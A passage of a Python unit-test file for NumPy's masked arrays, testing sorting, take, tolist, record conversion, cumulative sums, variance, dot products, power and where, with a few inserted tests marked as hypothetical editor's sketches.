mask=[(0, 0), (0, 1), (0, 0), (0, 0), (1, 0), (0, 0), (0, 0)],
dtype=[('A', int), ('B', int)])
test = sort(a)
b = array(
data=[(1, 1), (1, 2), (2, 1), (2, 2), (3, 3), (3, 2), (1, 0)],
mask=[(0, 0), (0, 0), (0, 0), (0, 0), (0, 0), (0, 1), (1, 0)],
dtype=[('A', int), ('B', int)])
assert_equal(test, b)
assert_equal(test.mask, b.mask)
test = sort(a, endwith=False)
b = array(
data=[(1, 0), (1, 1), (1, 2), (2, 1), (2, 2), (3, 2), (3, 3), ],
mask=[(1, 0), (0, 0), (0, 0), (0, 0), (0, 0), (0, 1), (0, 0), ],
dtype=[('A', int), ('B', int)])
assert_equal(test, b)
assert_equal(test.mask, b.mask)
def test_argsort(self):
# Test argsort
a = array([1, 5, 2, 4, 3], mask=[1, 0, 0, 1, 0])
assert_equal(np.argsort(a), argsort(a))
def test_squeeze(self):
# Check squeeze
data = masked_array([[1, 2, 3]])
assert_equal(data.squeeze(), [1, 2, 3])
data = masked_array([[1, 2, 3]], mask=[[1, 1, 1]])
assert_equal(data.squeeze(), [1, 2, 3])
assert_equal(data.squeeze()._mask, [1, 1, 1])
data = masked_array([[1]], mask=True)
self.assertTrue(data.squeeze() is masked)
def test_swapaxes(self):
# Tests swapaxes on MaskedArrays.
x = np.array([8.375, 7.545, 8.828, 8.5, 1.757, 5.928,
8.43, 7.78, 9.865, 5.878, 8.979, 4.732,
3.012, 6.022, 5.095, 3.116, 5.238, 3.957,
6.04, 9.63, 7.712, 3.382, 4.489, 6.479,
7.189, 9.645, 5.395, 4.961, 9.894, 2.893,
7.357, 9.828, 6.272, 3.758, 6.693, 0.993])
m = np.array([0, 1, 0, 1, 0, 0,
1, 0, 1, 1, 0, 1,
0, 0, 0, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 0, 0,
0, 0, 1, 0, 1, 0])
mX = array(x, mask=m).reshape(6, 6)
mXX = mX.reshape(3, 2, 2, 3)
mXswapped = mX.swapaxes(0, 1)
assert_equal(mXswapped[-1], mX[:, -1])
mXXswapped = mXX.swapaxes(0, 2)
assert_equal(mXXswapped.shape, (2, 2, 3, 3))
def test_take(self):
# Tests take
x = masked_array([10, 20, 30, 40], [0, 1, 0, 1])
assert_equal(x.take([0, 0, 3]), masked_array([10, 10, 40], [0, 0, 1]))
assert_equal(x.take([0, 0, 3]), x[[0, 0, 3]])
assert_equal(x.take([[0, 1], [0, 1]]),
masked_array([[10, 20], [10, 20]], [[0, 1], [0, 1]]))
x = array([[10, 20, 30], [40, 50, 60]], mask=[[0, 0, 1], [1, 0, 0, ]])
assert_equal(x.take([0, 2], axis=1),
array([[10, 30], [40, 60]], mask=[[0, 1], [1, 0]]))
assert_equal(take(x, [0, 2], axis=1),
array([[10, 30], [40, 60]], mask=[[0, 1], [1, 0]]))
def test_take_masked_indices(self):
# Test take w/ masked indices
a = np.array((40, 18, 37, 9, 22))
indices = np.arange(3)[None,:] + np.arange(5)[:, None]
mindices = array(indices, mask=(indices >= len(a)))
# No mask
test = take(a, mindices, mode='clip')
ctrl = array([[40, 18, 37],
[18, 37, 9],
[37, 9, 22],
[9, 22, 22],
[22, 22, 22]])
assert_equal(test, ctrl)
# Masked indices
test = take(a, mindices)
ctrl = array([[40, 18, 37],
[18, 37, 9],
[37, 9, 22],
[9, 22, 40],
[22, 40, 40]])
ctrl[3, 2] = ctrl[4, 1] = ctrl[4, 2] = masked
assert_equal(test, ctrl)
assert_equal(test.mask, ctrl.mask)
# Masked input + masked indices
a = array((40, 18, 37, 9, 22), mask=(0, 1, 0, 0, 0))
test = take(a, mindices)
ctrl[0, 1] = ctrl[1, 0] = masked
assert_equal(test, ctrl)
assert_equal(test.mask, ctrl.mask)
def test_tolist(self):
        # Tests tolist.
# ... on 1D
x = array(np.arange(12))
x[[1, -2]] = masked
xlist = x.tolist()
self.assertTrue(xlist[1] is None)
self.assertTrue(xlist[-2] is None)
# ... on 2D
x.shape = (3, 4)
xlist = x.tolist()
ctrl = [[0, None, 2, 3], [4, 5, 6, 7], [8, 9, None, 11]]
assert_equal(xlist[0], [0, None, 2, 3])
assert_equal(xlist[1], [4, 5, 6, 7])
assert_equal(xlist[2], [8, 9, None, 11])
assert_equal(xlist, ctrl)
# ... on structured array w/ masked records
x = array(list(zip([1, 2, 3],
[1.1, 2.2, 3.3],
['one', 'two', 'thr'])),
dtype=[('a', int), ('b', float), ('c', '|S8')])
x[-1] = masked
assert_equal(x.tolist(),
[(1, 1.1, asbytes('one')),
(2, 2.2, asbytes('two')),
(None, None, None)])
# ... on structured array w/ masked fields
a = array([(1, 2,), (3, 4)], mask=[(0, 1), (0, 0)],
dtype=[('a', int), ('b', int)])
test = a.tolist()
assert_equal(test, [[1, None], [3, 4]])
# ... on mvoid
a = a[0]
test = a.tolist()
assert_equal(test, [1, None])
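    def test_tolist_fill_value_sketch(self):
        # Editor's sketch (hypothetical test, not part of the original
        # suite): passing a fill_value to tolist() substitutes it for
        # the masked entries instead of the default None placeholder.
        x = array([1, 2, 3], mask=[0, 1, 0])
        assert_equal(x.tolist(), [1, None, 3])
        assert_equal(x.tolist(-999), [1, -999, 3])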
def test_tolist_specialcase(self):
# Test mvoid.tolist: make sure we return a standard Python object
a = array([(0, 1), (2, 3)], dtype=[('a', int), ('b', int)])
# w/o mask: each entry is a np.void whose elements are standard Python
for entry in a:
for item in entry.tolist():
assert_(not isinstance(item, np.generic))
# w/ mask: each entry is a ma.void whose elements should be
# standard Python
a.mask[0] = (0, 1)
for entry in a:
for item in entry.tolist():
assert_(not isinstance(item, np.generic))
def test_toflex(self):
# Test the conversion to records
data = arange(10)
record = data.toflex()
assert_equal(record['_data'], data._data)
assert_equal(record['_mask'], data._mask)
data[[0, 1, 2, -1]] = masked
record = data.toflex()
assert_equal(record['_data'], data._data)
assert_equal(record['_mask'], data._mask)
ndtype = [('i', int), ('s', '|S3'), ('f', float)]
data = array([(i, s, f) for (i, s, f) in zip(np.arange(10),
'ABCDEFGHIJKLM',
np.random.rand(10))],
dtype=ndtype)
data[[0, 1, 2, -1]] = masked
record = data.toflex()
assert_equal(record['_data'], data._data)
assert_equal(record['_mask'], data._mask)
ndtype = np.dtype("int, (2,3)float, float")
data = array([(i, f, ff) for (i, f, ff) in zip(np.arange(10),
np.random.rand(10),
np.random.rand(10))],
dtype=ndtype)
data[[0, 1, 2, -1]] = masked
record = data.toflex()
assert_equal_records(record['_data'], data._data)
assert_equal_records(record['_mask'], data._mask)
def test_fromflex(self):
# Test the reconstruction of a masked_array from a record
a = array([1, 2, 3])
test = fromflex(a.toflex())
assert_equal(test, a)
assert_equal(test.mask, a.mask)
a = array([1, 2, 3], mask=[0, 0, 1])
test = fromflex(a.toflex())
assert_equal(test, a)
assert_equal(test.mask, a.mask)
a = array([(1, 1.), (2, 2.), (3, 3.)], mask=[(1, 0), (0, 0), (0, 1)],
dtype=[('A', int), ('B', float)])
test = fromflex(a.toflex())
assert_equal(test, a)
assert_equal(test.data, a.data)
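    def test_toflex_fieldnames_sketch(self):
        # Editor's sketch (hypothetical test, not part of the original
        # suite): toflex() packs data and mask side by side in a
        # flexible-dtype ndarray with '_data' and '_mask' fields, which
        # is exactly the layout fromflex() consumes above.
        a = array([1, 2, 3], mask=[0, 1, 0])
        record = a.toflex()
        assert_equal(record.dtype.names, ('_data', '_mask'))
        assert_equal(record['_mask'], [0, 1, 0])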
def test_arraymethod(self):
# Test a _arraymethod w/ n argument
marray = masked_array([[1, 2, 3, 4, 5]], mask=[0, 0, 1, 0, 0])
control = masked_array([[1], [2], [3], [4], [5]],
mask=[0, 0, 1, 0, 0])
assert_equal(marray.T, control)
assert_equal(marray.transpose(), control)
assert_equal(MaskedArray.cumsum(marray.T, 0), control.cumsum(0))
class TestMaskedArrayMathMethods(TestCase):
def setUp(self):
# Base data definition.
x = np.array([8.375, 7.545, 8.828, 8.5, 1.757, 5.928,
8.43, 7.78, 9.865, 5.878, 8.979, 4.732,
3.012, 6.022, 5.095, 3.116, 5.238, 3.957,
6.04, 9.63, 7.712, 3.382, 4.489, 6.479,
7.189, 9.645, 5.395, 4.961, 9.894, 2.893,
7.357, 9.828, 6.272, 3.758, 6.693, 0.993])
X = x.reshape(6, 6)
XX = x.reshape(3, 2, 2, 3)
m = np.array([0, 1, 0, 1, 0, 0,
1, 0, 1, 1, 0, 1,
0, 0, 0, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 0, 0,
0, 0, 1, 0, 1, 0])
mx = array(data=x, mask=m)
mX = array(data=X, mask=m.reshape(X.shape))
mXX = array(data=XX, mask=m.reshape(XX.shape))
m2 = np.array([1, 1, 0, 1, 0, 0,
1, 1, 1, 1, 0, 1,
0, 0, 1, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 1, 0,
0, 0, 1, 0, 1, 1])
m2x = array(data=x, mask=m2)
m2X = array(data=X, mask=m2.reshape(X.shape))
m2XX = array(data=XX, mask=m2.reshape(XX.shape))
self.d = (x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX)
def test_cumsumprod(self):
# Tests cumsum & cumprod on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
mXcp = mX.cumsum(0)
assert_equal(mXcp._data, mX.filled(0).cumsum(0))
mXcp = mX.cumsum(1)
assert_equal(mXcp._data, mX.filled(0).cumsum(1))
mXcp = mX.cumprod(0)
assert_equal(mXcp._data, mX.filled(1).cumprod(0))
mXcp = mX.cumprod(1)
assert_equal(mXcp._data, mX.filled(1).cumprod(1))
def test_cumsumprod_with_output(self):
# Tests cumsum/cumprod w/ output
xm = array(np.random.uniform(0, 10, 12)).reshape(3, 4)
xm[:, 0] = xm[0] = xm[-1, -1] = masked
for funcname in ('cumsum', 'cumprod'):
npfunc = getattr(np, funcname)
xmmeth = getattr(xm, funcname)
# A ndarray as explicit input
output = np.empty((3, 4), dtype=float)
output.fill(-9999)
result = npfunc(xm, axis=0, out=output)
# ... the result should be the given output
self.assertTrue(result is output)
assert_equal(result, xmmeth(axis=0, out=output))
output = empty((3, 4), dtype=int)
result = xmmeth(axis=0, out=output)
self.assertTrue(result is output)
def test_ptp(self):
# Tests ptp on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
(n, m) = X.shape
assert_equal(mx.ptp(), mx.compressed().ptp())
rows = np.zeros(n, np.float)
cols = np.zeros(m, np.float)
for k in range(m):
cols[k] = mX[:, k].compressed().ptp()
for k in range(n):
rows[k] = mX[k].compressed().ptp()
assert_equal(mX.ptp(0), cols)
assert_equal(mX.ptp(1), rows)
def test_add_object(self):
x = masked_array(['a', 'b'], mask=[1, 0], dtype=object)
y = x + 'x'
assert_equal(y[1], 'bx')
assert_(y.mask[0])
def test_sum_object(self):
# Test sum on object dtype
a = masked_array([1, 2, 3], mask=[1, 0, 0], dtype=np.object)
assert_equal(a.sum(), 5)
a = masked_array([[1, 2, 3], [4, 5, 6]], dtype=object)
assert_equal(a.sum(axis=0), [5, 7, 9])
def test_prod_object(self):
# Test prod on object dtype
a = masked_array([1, 2, 3], mask=[1, 0, 0], dtype=np.object)
assert_equal(a.prod(), 2 * 3)
a = masked_array([[1, 2, 3], [4, 5, 6]], dtype=object)
assert_equal(a.prod(axis=0), [4, 10, 18])
def test_meananom_object(self):
# Test mean/anom on object dtype
a = masked_array([1, 2, 3], dtype=np.object)
assert_equal(a.mean(), 2)
assert_equal(a.anom(), [-1, 0, 1])
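    def test_anom_sketch(self):
        # Editor's sketch (hypothetical test, not part of the original
        # suite): anom() is the deviation from the mean, with the mean
        # taken over the unmasked entries only.
        a = masked_array([1., 2., 3., 4.], mask=[0, 0, 0, 1])
        assert_equal(a.mean(), 2.)
        assert_equal(a.anom().compressed(), [-1., 0., 1.])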
def test_trace(self):
# Tests trace on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
mXdiag = mX.diagonal()
assert_equal(mX.trace(), mX.diagonal().compressed().sum())
assert_almost_equal(mX.trace(),
X.trace() - sum(mXdiag.mask * X.diagonal(),
axis=0))
def test_dot(self):
# Tests dot on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
fx = mx.filled(0)
r = mx.dot(mx)
assert_almost_equal(r.filled(0), fx.dot(fx))
assert_(r.mask is nomask)
fX = mX.filled(0)
r = mX.dot(mX)
assert_almost_equal(r.filled(0), fX.dot(fX))
assert_(r.mask[1,3])
r1 = empty_like(r)
mX.dot(mX, r1)
assert_almost_equal(r, r1)
mYY = mXX.swapaxes(-1, -2)
fXX, fYY = mXX.filled(0), mYY.filled(0)
r = mXX.dot(mYY)
assert_almost_equal(r.filled(0), fXX.dot(fYY))
r1 = empty_like(r)
mXX.dot(mYY, r1)
assert_almost_equal(r, r1)
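    def test_dot_filled_equivalence_sketch(self):
        # Editor's sketch (hypothetical test, not part of the original
        # suite): the assertions above rely on dot computing with the
        # masked entries filled by 0, so the result matches the filled
        # arrays' dot product.
        a = masked_array([1., 2., 3.], mask=[0, 1, 0])
        b = masked_array([4., 5., 6.])
        assert_almost_equal(a.dot(b), 1.*4. + 3.*6.)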
def test_dot_shape_mismatch(self):
# regression test
x = masked_array([[1,2],[3,4]], mask=[[0,1],[0,0]])
y = masked_array([[1,2],[3,4]], mask=[[0,1],[0,0]])
z = masked_array([[0,1],[3,3]])
x.dot(y, out=z)
assert_almost_equal(z.filled(0), [[1, 0], [15, 16]])
assert_almost_equal(z.mask, [[0, 1], [0, 0]])
def test_varstd(self):
# Tests var & std on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
assert_almost_equal(mX.var(axis=None), mX.compressed().var())
assert_almost_equal(mX.std(axis=None), mX.compressed().std())
assert_almost_equal(mX.std(axis=None, ddof=1),
mX.compressed().std(ddof=1))
assert_almost_equal(mX.var(axis=None, ddof=1),
mX.compressed().var(ddof=1))
assert_equal(mXX.var(axis=3).shape, XX.var(axis=3).shape)
assert_equal(mX.var().shape, X.var().shape)
(mXvar0, mXvar1) = (mX.var(axis=0), mX.var(axis=1))
assert_almost_equal(mX.var(axis=None, ddof=2),
mX.compressed().var(ddof=2))
assert_almost_equal(mX.std(axis=None, ddof=2),
mX.compressed().std(ddof=2))
for k in range(6):
assert_almost_equal(mXvar1[k], mX[k].compressed().var())
assert_almost_equal(mXvar0[k], mX[:, k].compressed().var())
assert_almost_equal(np.sqrt(mXvar0[k]),
mX[:, k].compressed().std())
def test_varstd_specialcases(self):
# Test a special case for var
nout = np.array(-1, dtype=float)
mout = array(-1, dtype=float)
x = array(arange(10), mask=True)
for methodname in ('var', 'std'):
method = getattr(x, methodname)
self.assertTrue(method() is masked)
self.assertTrue(method(0) is masked)
self.assertTrue(method(-1) is masked)
# Using a masked array as explicit output
with warnings.catch_warnings():
warnings.simplefilter('ignore')
method(out=mout)
self.assertTrue(mout is not masked)
assert_equal(mout.mask, True)
# Using a ndarray as explicit output
with warnings.catch_warnings():
warnings.simplefilter('ignore')
method(out=nout)
self.assertTrue(np.isnan(nout))
x = array(arange(10), mask=True)
x[-1] = 9
for methodname in ('var', 'std'):
method = getattr(x, methodname)
self.assertTrue(method(ddof=1) is masked)
self.assertTrue(method(0, ddof=1) is masked)
self.assertTrue(method(-1, ddof=1) is masked)
# Using a masked array as explicit output
method(out=mout, ddof=1)
self.assertTrue(mout is not masked)
assert_equal(mout.mask, True)
# Using a ndarray as explicit output
method(out=nout, ddof=1)
self.assertTrue(np.isnan(nout))
def test_varstd_ddof(self):
a = array([[1, 1, 0], [1, 1, 0]], mask=[[0, 0, 1], [0, 0, 1]])
test = a.std(axis=0, ddof=0)
assert_equal(test.filled(0), [0, 0, 0])
assert_equal(test.mask, [0, 0, 1])
test = a.std(axis=0, ddof=1)
assert_equal(test.filled(0), [0, 0, 0])
assert_equal(test.mask, [0, 0, 1])
test = a.std(axis=0, ddof=2)
assert_equal(test.filled(0), [0, 0, 0])
assert_equal(test.mask, [1, 1, 1])
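    def test_varstd_ddof_counts_sketch(self):
        # Editor's sketch (hypothetical test, not part of the original
        # suite): the pattern above follows from the unmasked counts --
        # a result is masked as soon as (count - ddof) drops to zero or
        # below.
        a = array([1., 2., 3., 4.], mask=[0, 0, 1, 1])  # 2 unmasked
        assert_(a.var(ddof=1) is not masked)
        self.assertTrue(a.var(ddof=2) is masked)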
def test_diag(self):
# Test diag
x = arange(9).reshape((3, 3))
x[1, 1] = masked
out = np.diag(x)
assert_equal(out, [0, 4, 8])
out = diag(x)
assert_equal(out, [0, 4, 8])
assert_equal(out.mask, [0, 1, 0])
out = diag(out)
control = array([[0, 0, 0], [0, 4, 0], [0, 0, 8]],
mask=[[0, 0, 0], [0, 1, 0], [0, 0, 0]])
assert_equal(out, control)
def test_axis_methods_nomask(self):
# Test the combination nomask & methods w/ axis
a = array([[1, 2, 3], [4, 5, 6]])
assert_equal(a.sum(0), [5, 7, 9])
assert_equal(a.sum(-1), [6, 15])
assert_equal(a.sum(1), [6, 15])
assert_equal(a.prod(0), [4, 10, 18])
assert_equal(a.prod(-1), [6, 120])
assert_equal(a.prod(1), [6, 120])
assert_equal(a.min(0), [1, 2, 3])
assert_equal(a.min(-1), [1, 4])
assert_equal(a.min(1), [1, 4])
assert_equal(a.max(0), [4, 5, 6])
assert_equal(a.max(-1), [3, 6])
assert_equal(a.max(1), [3, 6])
class TestMaskedArrayMathMethodsComplex(TestCase):
# Test class for miscellaneous MaskedArrays methods.
def setUp(self):
# Base data definition.
x = np.array([8.375j, 7.545j, 8.828j, 8.5j, 1.757j, 5.928,
8.43, 7.78, 9.865, 5.878, 8.979, 4.732,
3.012, 6.022, 5.095, 3.116, 5.238, 3.957,
6.04, 9.63, 7.712, 3.382, 4.489, 6.479j,
7.189j, 9.645, 5.395, 4.961, 9.894, 2.893,
7.357, 9.828, 6.272, 3.758, 6.693, 0.993j])
X = x.reshape(6, 6)
XX = x.reshape(3, 2, 2, 3)
m = np.array([0, 1, 0, 1, 0, 0,
1, 0, 1, 1, 0, 1,
0, 0, 0, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 0, 0,
0, 0, 1, 0, 1, 0])
mx = array(data=x, mask=m)
mX = array(data=X, mask=m.reshape(X.shape))
mXX = array(data=XX, mask=m.reshape(XX.shape))
m2 = np.array([1, 1, 0, 1, 0, 0,
1, 1, 1, 1, 0, 1,
0, 0, 1, 1, 0, 1,
0, 0, 0, 1, 1, 1,
1, 0, 0, 1, 1, 0,
0, 0, 1, 0, 1, 1])
m2x = array(data=x, mask=m2)
m2X = array(data=X, mask=m2.reshape(X.shape))
m2XX = array(data=XX, mask=m2.reshape(XX.shape))
self.d = (x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX)
def test_varstd(self):
# Tests var & std on MaskedArrays.
(x, X, XX, m, mx, mX, mXX, m2x, m2X, m2XX) = self.d
assert_almost_equal(mX.var(axis=None), mX.compressed().var())
assert_almost_equal(mX.std(axis=None), mX.compressed().std())
assert_equal(mXX.var(axis=3).shape, XX.var(axis=3).shape)
assert_equal(mX.var().shape, X.var().shape)
(mXvar0, mXvar1) = (mX.var(axis=0), mX.var(axis=1))
assert_almost_equal(mX.var(axis=None, ddof=2),
mX.compressed().var(ddof=2))
assert_almost_equal(mX.std(axis=None, ddof=2),
mX.compressed().std(ddof=2))
for k in range(6):
assert_almost_equal(mXvar1[k], mX[k].compressed().var())
assert_almost_equal(mXvar0[k], mX[:, k].compressed().var())
assert_almost_equal(np.sqrt(mXvar0[k]),
mX[:, k].compressed().std())
class TestMaskedArrayFunctions(TestCase):
# Test class for miscellaneous functions.
def setUp(self):
x = np.array([1., 1., 1., -2., pi/2.0, 4., 5., -10., 10., 1., 2., 3.])
y = np.array([5., 0., 3., 2., -1., -4., 0., -10., 10., 1., 0., 3.])
m1 = [1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
m2 = [0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1]
xm = masked_array(x, mask=m1)
ym = masked_array(y, mask=m2)
xm.set_fill_value(1e+20)
self.info = (xm, ym)
def test_masked_where_bool(self):
x = [1, 2]
y = masked_where(False, x)
assert_equal(y, [1, 2])
assert_equal(y[1], 2)
def test_masked_equal_wlist(self):
x = [1, 2, 3]
mx = masked_equal(x, 3)
assert_equal(mx, x)
assert_equal(mx._mask, [0, 0, 1])
mx = masked_not_equal(x, 3)
assert_equal(mx, x)
assert_equal(mx._mask, [1, 1, 0])
def test_masked_equal_fill_value(self):
x = [1, 2, 3]
mx = masked_equal(x, 3)
assert_equal(mx._mask, [0, 0, 1])
assert_equal(mx.fill_value, 3)
def test_masked_where_condition(self):
# Tests masking functions.
x = array([1., 2., 3., 4., 5.])
x[2] = masked
assert_equal(masked_where(greater(x, 2), x), masked_greater(x, 2))
assert_equal(masked_where(greater_equal(x, 2), x),
masked_greater_equal(x, 2))
assert_equal(masked_where(less(x, 2), x), masked_less(x, 2))
assert_equal(masked_where(less_equal(x, 2), x),
masked_less_equal(x, 2))
assert_equal(masked_where(not_equal(x, 2), x), masked_not_equal(x, 2))
assert_equal(masked_where(equal(x, 2), x), masked_equal(x, 2))
assert_equal(masked_where(not_equal(x, 2), x), masked_not_equal(x, 2))
assert_equal(masked_where([1, 1, 0, 0, 0], [1, 2, 3, 4, 5]),
[99, 99, 3, 4, 5])
def test_masked_where_oddities(self):
# Tests some generic features.
atest = ones((10, 10, 10), dtype=float)
btest = zeros(atest.shape, MaskType)
ctest = masked_where(btest, atest)
assert_equal(atest, ctest)
def test_masked_where_shape_constraint(self):
a = arange(10)
try:
test = masked_equal(1, a)
except IndexError:
pass
else:
raise AssertionError("Should have failed...")
test = masked_equal(a, 1)
assert_equal(test.mask, [0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
def test_masked_where_structured(self):
# test that masked_where on a structured array sets a structured
# mask (see issue #2972)
a = np.zeros(10, dtype=[("A", "<f2"), ("B", "<f4")])
am = np.ma.masked_where(a["A"] < 5, a)
assert_equal(am.mask.dtype.names, am.dtype.names)
assert_equal(am["A"],
np.ma.masked_array(np.zeros(10), np.ones(10)))
def test_masked_otherfunctions(self):
assert_equal(masked_inside(list(range(5)), 1, 3),
[0, 199, 199, 199, 4])
assert_equal(masked_outside(list(range(5)), 1, 3), [199, 1, 2, 3, 199])
assert_equal(masked_inside(array(list(range(5)),
mask=[1, 0, 0, 0, 0]), 1, 3).mask,
[1, 1, 1, 1, 0])
assert_equal(masked_outside(array(list(range(5)),
mask=[0, 1, 0, 0, 0]), 1, 3).mask,
[1, 1, 0, 0, 1])
assert_equal(masked_equal(array(list(range(5)),
mask=[1, 0, 0, 0, 0]), 2).mask,
[1, 0, 1, 0, 0])
assert_equal(masked_not_equal(array([2, 2, 1, 2, 1],
mask=[1, 0, 0, 0, 0]), 2).mask,
[1, 0, 1, 0, 1])
def test_round(self):
a = array([1.23456, 2.34567, 3.45678, 4.56789, 5.67890],
mask=[0, 1, 0, 0, 0])
assert_equal(a.round(), [1., 2., 3., 5., 6.])
assert_equal(a.round(1), [1.2, 2.3, 3.5, 4.6, 5.7])
assert_equal(a.round(3), [1.235, 2.346, 3.457, 4.568, 5.679])
b = empty_like(a)
a.round(out=b)
assert_equal(b, [1., 2., 3., 5., 6.])
x = array([1., 2., 3., 4., 5.])
c = array([1, 1, 1, 0, 0])
x[2] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
c[0] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
assert_(z[0] is masked)
assert_(z[1] is not masked)
assert_(z[2] is masked)
def test_round_with_output(self):
# Testing round with an explicit output
xm = array(np.random.uniform(0, 10, 12)).reshape(3, 4)
xm[:, 0] = xm[0] = xm[-1, -1] = masked
# A ndarray as explicit input
output = np.empty((3, 4), dtype=float)
output.fill(-9999)
result = np.round(xm, decimals=2, out=output)
# ... the result should be the given output
self.assertTrue(result is output)
assert_equal(result, xm.round(decimals=2, out=output))
output = empty((3, 4), dtype=float)
result = xm.round(decimals=2, out=output)
self.assertTrue(result is output)
def test_round_with_scalar(self):
# Testing round with scalar/zero dimension input
# GH issue 2244
a = array(1.1, mask=[False])
assert_equal(a.round(), 1)
a = array(1.1, mask=[True])
assert_(a.round() is masked)
a = array(1.1, mask=[False])
output = np.empty(1, dtype=float)
output.fill(-9999)
a.round(out=output)
assert_equal(output, 1)
a = array(1.1, mask=[False])
output = array(-9999., mask=[True])
a.round(out=output)
assert_equal(output[()], 1)
a = array(1.1, mask=[True])
output = array(-9999., mask=[False])
a.round(out=output)
assert_(output[()] is masked)
def test_identity(self):
a = identity(5)
self.assertTrue(isinstance(a, MaskedArray))
assert_equal(a, np.identity(5))
def test_power(self):
x = -1.1
assert_almost_equal(power(x, 2.), 1.21)
self.assertTrue(power(x, masked) is masked)
x = array([-1.1, -1.1, 1.1, 1.1, 0.])
b = array([0.5, 2., 0.5, 2., -1.], mask=[0, 0, 0, 0, 1])
y = power(x, b)
assert_almost_equal(y, [0, 1.21, 1.04880884817, 1.21, 0.])
assert_equal(y._mask, [1, 0, 0, 0, 1])
b.mask = nomask
y = power(x, b)
assert_equal(y._mask, [1, 0, 0, 0, 1])
z = x ** b
assert_equal(z._mask, y._mask)
assert_almost_equal(z, y)
assert_almost_equal(z._data, y._data)
x **= b
assert_equal(x._mask, y._mask)
assert_almost_equal(x, y)
assert_almost_equal(x._data, y._data)
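    def test_power_invalid_domain_sketch(self):
        # Editor's sketch (hypothetical test, not part of the original
        # suite): as the masks above show, ma.power masks results that
        # would be invalid under np.power -- here a negative base with
        # a fractional exponent -- rather than returning nan.
        y = power(array([-2., 2.]), 0.5)
        assert_equal(y.mask, [1, 0])
        assert_almost_equal(y[1], np.sqrt(2.))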
def test_power_w_broadcasting(self):
# Test power w/ broadcasting
a2 = np.array([[1., 2., 3.], [4., 5., 6.]])
a2m = array(a2, mask=[[1, 0, 0], [0, 0, 1]])
b1 = np.array([2, 4, 3])
b2 = np.array([b1, b1])
b2m = array(b2, mask=[[0, 1, 0], [0, 1, 0]])
ctrl = array([[1 ** 2, 2 ** 4, 3 ** 3], [4 ** 2, 5 ** 4, 6 ** 3]],
mask=[[1, 1, 0], [0, 1, 1]])
# No broadcasting, base & exp w/ mask
test = a2m ** b2m
assert_equal(test, ctrl)
assert_equal(test.mask, ctrl.mask)
# No broadcasting, base w/ mask, exp w/o mask
test = a2m ** b2
assert_equal(test, ctrl)
assert_equal(test.mask, a2m.mask)
# No broadcasting, base w/o mask, exp w/ mask
test = a2 ** b2m
assert_equal(test, ctrl)
assert_equal(test.mask, b2m.mask)
ctrl = array([[2 ** 2, 4 ** 4, 3 ** 3], [2 ** 2, 4 ** 4, 3 ** 3]],
mask=[[0, 1, 0], [0, 1, 0]])
test = b1 ** b2m
assert_equal(test, ctrl)
assert_equal(test.mask, ctrl.mask)
test = b2m ** b1
assert_equal(test, ctrl)
assert_equal(test.mask, ctrl.mask)
def test_where(self):
# Test the where function
x = np.array([1., 1., 1., -2., pi/2.0, 4., 5., -10., 10., 1., 2., 3.])
y = np.array([5., 0., 3., 2., -1., -4., 0., -10., 10., 1., 0., 3.])
m1 = [1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
m2 = [0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1]
xm = masked_array(x, mask=m1)
ym = masked_array(y, mask=m2)
xm.set_fill_value(1e+20)
d = where(xm > 2, xm, -9)
assert_equal(d, [-9., -9., -9., -9., -9., 4.,
-9., -9., 10., -9., -9., 3.])
assert_equal(d._mask, xm._mask)
d = where(xm > 2, -9, ym)
assert_equal(d, [5., 0., 3., 2., -1., -9.,
-9., -10., -9., 1., 0., -9.])
assert_equal(d._mask, [1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0])
d = where(xm > 2, xm, masked)
assert_equal(d, [-9., -9., -9., -9., -9., 4.,
-9., -9., 10., -9., -9., 3.])
tmp = xm._mask.copy()
tmp[(xm <= 2).filled(True)] = True
assert_equal(d._mask, tmp)
ixm = xm.astype(int)
d = where(ixm > 2, ixm, masked)
assert_equal(d, [-9, -9, -9, -9, -9, 4, -9, -9, 10, -9, -9, 3])
assert_equal(d.dtype, ixm.dtype)
def test_where_object(self):
a = np.array(None)
b = masked_array(None)
r = b.copy()
assert_equal(np.ma.where(True, a, a), r)
assert_equal(np.ma.where(True, b, b), r)
def test_where_with_masked_choice(self):
x = arange(10)
x[3] = masked
c = x >= 8
# Set False to masked
z = where(c, x, masked)
assert_(z.dtype is x.dtype)
assert_(z[3] is masked)
assert_(z[4] is masked)
assert_(z[7] is masked)
assert_(z[8] is not masked)
assert_(z[9] is not masked)
assert_equal(x, z)
# Set True to masked
z = where(c, masked, x)
assert_(z.dtype is x.dtype)
assert_(z[3] is masked)
assert_(z[4] is not masked)
assert_(z[7] is not masked)
assert_(z[8] is masked)
assert_(z[9] is masked)
def test_where_with_masked_condition(self):
x = array([1., 2., 3., 4., 5.])
c = array([1, 1, 1, 0, 0])
x[2] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
c[0] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
assert_(z[0] is masked)
assert_(z[1] is not masked)
assert_(z[2] is masked)
x = arange(1, 6)
x[-1] = masked
y = arange(1, 6) * 10
y[2] = masked
c = array([1, 1, 1, 0, 0], mask=[1, 0, 0, 0, 0])
cm = c.filled(1)
z = where(c, x, y)
zm = where(cm, x, y)
assert_equal(z, zm)
assert_(getmask(zm) is nomask)
